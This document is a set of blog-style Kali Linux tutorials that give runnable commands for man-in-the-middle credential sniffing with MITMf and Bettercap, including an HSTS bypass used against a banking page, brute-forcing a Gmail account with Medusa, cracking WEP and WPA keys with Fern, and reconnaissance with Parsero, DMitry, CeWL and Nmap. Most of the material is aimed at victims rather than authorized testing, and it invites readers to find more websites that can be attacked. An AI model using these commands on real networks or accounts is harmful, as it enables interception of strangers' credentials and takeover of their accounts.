Sniffing Passwords with MITMf

MITMf aims to provide a one-stop-shop for Man-In-The-Middle and network attacks while updating and improving existing attacks and techniques.

• The framework contains a built-in SMB, HTTP and DNS server that can be controlled and used by the various plugins, it also contains a modified version of the SSLStrip proxy that allows for HTTP modification and a partial HSTS bypass.
• As of version 0.9.8, MITMf supports active packet filtering and manipulation (basically what etterfilters did, only better), allowing users to modify any type of traffic or protocol.
• The configuration file can be edited on-the-fly while MITMf is running, the changes will be passed down through the framework: this allows you to tweak settings of plugins and servers while performing an attack.
• MITMf will capture FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (community strings), NTLMv1/v2 (all supported protocols like HTTP, SMB, LDAP etc.) and Kerberos credentials by using Net-Creds, which is run on startup.
• Responder integration allows for LLMNR, NBT-NS and MDNS poisoning and WPAD rogue server support.

Follow these instructions to install MITMf on your Kali machine then run      mitmf -h to see its options.

Type these commands: mitmf -i wlan0 –spoof –arp –hsts –dns –gateway 192.168.1.1  Just change your interface and gateway address you can get your gateway by typing route -n

Press enter to see the magic of mitmf in front of your eyes.

Information keeps on flowing. Oops HSTS is bypassed…

The userid I entered.

The password.

I tested it on a SSL-enabled banking page using my mobile phone but look I’m still able to sniff the traffic on plain text. I couldn’t make it work on Facebook, Gmail and Yahoo but I think there’s a lot of secured websites out there that you can still hack with the tool. So test it for yourself and comment below the websites that can work with MITMf. Good luck to your sniffing test!

Finding Admin Pages isn’t hard with Parsero

When I was starting out hacking websites I had hard time finding the administrator pages and I wasted so much time manually finding it by adding robots.txt on the web page. But… here’s the tool to easily find the login page after having the credentials.

Parsero isn’t installed by default in the Kali version so what are you waiting type the above command to keep on going.

Let’s view first the options of the tool after installing and it’s very self explanatory to use.

Look at the output! It clearly show us the important pages of the website. And the Admin page is also there. Good luck!

Hacking Gmail Accounts with Medusa

Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. The goal is to support as many services which allow remote authentication as possible. The author considers following items as some of the key features of this application.

• Thread-based parallel testing. Brute-force testing can be performed against multiple hosts, users or passwords concurrently.
• Flexible user input. Target information (host/user/password) can be specified in a variety of ways. For example, each item can be either a single entry or a file containing multiple entries. Additionally, a combination file format allows the user to refine their target listing.
• Modular design. Each service module exists as an independent .mod file. This means that no modifications are necessary to the core application in order to extend the supported list of services for brute-forcing.

Type medusa -h

As with any hacking tool let’s find first the options we can use. Now we know the options what next?

medusa -h smtp.gmail.com -u johndoe@gmail.com -P /wordlist/location -s -M smtp

-h (target hostname or IP)  -u (victims username) -P (file containing wordlist) -s (Enable SSL)  -M (module name) After specifying your target details what are you waiting for? Press Enter.

To make this demo fast because I hate wasting your time I only used 16 password to be tested against the account. As shown on the screen it has successfully found my Gmail password. I also tested Medusa against Yahoo but it failed after a few tries it gets blocked.

Find Hidden Network with Kismet

In Kali there are few tools to find hidden network or SSID, for example you can use aircrack-ng to view hidden SSIDs but their full network name will stay hidden on the screen unless you deauth a connected client and when it tries to reconnect the networks name will appear. The easiest way to find hidden networks is using a tool called Kismet. Enter command kismet -h to show the options. Type kismet -c wlan1  (depends on your wireless card sometimes wlan0, eth0).

Kismet will ask you if you want to start the server choose Yes

There you go the hidden network was detected!

To know more details on the network same as the picture below just click it. The point here is hiding your network is pretty useless option.

Crack WEP using Fern Wifi Cracker

In my previous tutorial I show how to crack WPA password but now let’s downgrade on cracking WEP that is less secure and easier to crack than WPA password, easier than eating popcorn. In cracking WEP password you don’t need to use any wordlist because cracking the key depends on the initialization vectors you’ve captured and the tool will automatically crack the key. Fire up Fern Cracker once again you goddamn bastard!

1. Choose the wireless card (ex. wlan0, wlan1, eth0)
2. Scan for wireless APs nearby
3. When there’s available WEP APs the WEP button will be abled, just click the button and it will open the attack panel.

This panel will show you useful information on the router. – channel, ESSID, BSID. Click your target router, tick the regular attack and on the upper right side click wifi attack. When everything goes smoothly you’ll see the increasing number of IVs like the picture above. Take note that the speed of IVs depends on the connected devices using the network because if they are just connected but not browsing something the attack will be very slow.

27133 IVs and counting still no WEP key but in this world for us to exist, patience is virtue. You can leave it there and watch your favorite tv show.

Alas! the WEP key! a 26-digit key that you can enter as password or if you want you can decrypt the password using online hex to ascii converters. To sum it, if you’re still using WEP change it to more secure WPA/WPA2. There’s another tool that can crack WEP like wifite that I will use in my upcoming tutorials.

Fern Wifi Cracker – Automated WPA Password Cracking

Fern Wifi Cracker is a Wireless security auditing and attack software program written using the Python Programming Language and the Python QT Gui Library, the program is able to crack and recover WEP/WPA/WPS keys and also run other network based attacks on wireless or ethernet based networks.

Fern Wifi Cracker currently supports the following features:

• WEP Cracking with Fragmentation,Chop-Chop, Caffe-Latte, Hirte, ARP Request Replay or WPS attack
• WPA/WPA2 Cracking with Dictionary or WPS based attacks
• Automatic saving of key in database on successful crack
• Automatic Access Point Attack System
• Session Hijacking (Passive and Ethernet Modes)
• Access Point MAC Address Geo Location Tracking
• Internal MITM Engine
• Bruteforce Attacks (HTTP,HTTPS,TELNET,FTP)
• Update Support

First step, make sure your card is capable of packet injection read here and here  here for compatible wireless cards. If not there’s no need to follow the instructions below you’ll never crack any wifi password without using compatible cards. Then let’s check your cards interface to use type airmon-ng, mine is wlan1 with ath9k driver. After all let’s kill processes that can intervene with your cards driver type airmon-ng check kill

Run Fern Wifi cracker and choose from the drop down tab the wifi card it will automatically enable the card in monitor mode. See the green text Monitor mode enabled on wlan1mon.

Next click the Scan for Access Points to look for target APs if it detects WEP the wep button will be highlighted if not the WPA, in my case a WPA access point was detected. Now just click the WPA button to open the attack panel where you’ll fulfill your dream of being a wifi hacker.

Select your target access point, tick if it’s regular or wps attack (for wps enabled routers), upload your wordlist to be used in password cracking then click Wifi attack and this tool will magically do everything for you as if you’re having magic wand.

All wifi cracking tools follow these steps – deauth connected clients, capture the handshake and crack the password against your wordlist – wait! here’s the catch, if your wordlist contains the password you can get the password, if not, either get a bigger wordlist or buy faster machine that can bruteforce it without relying on wordlist. The length of time cracking WPA/WPA2 depends on how big is your wordlist and your luck, unlike cracking WEP which depends on IVs captured.

That’s it, the WPA password! There’s a lot of tool in Linux that can crack WPA/WPA2 but Fern Cracker is the easiest to use, thanks to its user friendly GUI.

DMitry – Deepmagic Information Gathering Tool

DMitry (Deepmagic Information Gathering Tool) is a UNIX/(GNU)Linux Command Line Application coded in C. DMitry has the ability to gather as much information as possible about a host. Base functionality is able to gather possible subdomains, email addresses, uptime information, tcp port scan, whois lookups, and more.

The following is a list of the current features:

• An Open Source Project.
• Perform an Internet Number whois lookup.
• Retrieve possible uptime data, system and server data.
• Perform a SubDomain search on a target host.
• Perform an E-Mail address search on a target host.
• Perform a TCP Portscan on the host target.
• A Modular program allowing user specified modules

Source: http://mor-pah.net/software/dmitry-deepmagic-information-gathering-tool/

Installing the tool is not a problem DMitry is built-in Kali Rolling just type dmitry -h to see the options you can use against your target website.

Type dmitry -isep example.com , i only use the basic commands you have the option if you want to gather more information type dmitry -winsep example.com   

Valuable info on your target website just keep on flowing…

And flowing… The last part will usually include the emails gathered and ports scanned. There you go such a vast amount of information you can use on your future attacks on the target host.

CeWL – Custom Wordlist Generator

CeWL, the Custom Word List generator. CeWL is a ruby app which spiders a given url to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers such as John the Ripper. CeWL also has an associated command line app, FAB (Files Already Bagged) which uses the same meta data extraction techniques to create author/creator lists from already downloaded.

Type cewl -h for help

• cewl -v -m 8 -w /root/Desktop/cewl.txt example.com

-v verbose, -m minimum word length to crawl, -w write output to a file and website CeWL will crawl. Grab coffee or beer because this will take sometime it depends on how big is your target website.

After finishing the scan you want to know how many words are added to the file type wc -l /root/Desktop/cewl.txt to count the number of words. As you see 548 words are added to my wordlist. What now? You can feed it on Aircrack, Pyrit, or John the Ripper because most of the time admins are using usernames and passwords that you can easily find in their websites.

Nmap Reconnaissance

Nmap (“Network Mapper”) is a free and open source utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X.

I’m going to show how to scan your own network using Nmap with these simple steps. Take note that Nmap is already installed in Kali all you need is type the following to list all commands.

• nmap -h

Let’s scan first with -v verbose mode to gather info about the network where you can clearly see the open ports and mac address of the router. Here you can insert your target’s IP address or webpage like nmap -v 192.168.1.1 or nmap -v example.com

• nmap -v 192.168.1.1

The second scan enable OS detection, version detection and script scanning, here you can see lot of information about the network, OS details, traceroute, even the router’s admin page was included.

• nmap -A 192.168.1.1

The scan to see the open ports of the router and there’s my router’s open ports – 4 in all.

• nmap -open 192.168.1.1

And to see the connected devices in the network type

• nmap -sP 192.168.1.1/24

Now you saw how simple Nmap commands can find important information on your target network. All you have to do is try all the commands against your network and not your neighborhood. Happy Hacking!

Wifi Sniffing with Bettercap

What is Bettercap?

Bettercap is a powerful tool to perform various types of Man-In-The-Middle (MITM) attacks against the network, manipulate HTTP and HTTPS traffic in realtime and much more.

Some of the main features include:

• Full and half duplex ARP spoofing.
• The first real ICMP DoubleDirect spoofing implementation.
• Configurable DNS spoofing.
• Realtime and completely automatized host discovery.
• Realtime credentials harvesting for protocols such as HTTP(S) POSTed data, Basic and Digest Authentications, FTP, IRC, POP, IMAP, SMTP, NTLM ( HTTP, SMB, LDAP, etc ) and more.
• Fully customizable network sniffer.
• Modular HTTP and HTTPS transparent proxies with support for user plugins + builtin plugins to inject custom HTML code, JS or CSS files and URLs.
• SSLStripping.
• Builtin HTTP server.

And much more! – Bettercap website

To cut it short this tool can sniff visited passwords and websites,spoof,sslstrip over wifi networks. Bettercap is not installed in Kali so you need to install one by typing:

• gem install bettercap then press enter
  

After installing type:

• bettercap -h  it will give you the commands available for the tool like below

The next part is choosing your victim’s mac address by using nmap or airodump. There’s a lot of tools to find the connected devices and after choosing your victim let’s move on sniffing part!

• bettercap -X -L -T (mac address…)

While you have the option in choosing your victims one by one you can also sniff all the devices connected to the network with the next command.

• bettercap -X -L

There’s more useful commands with bettercap available, it depends on what you want to capture, you can even specify the parsers to use. Endless possibilities!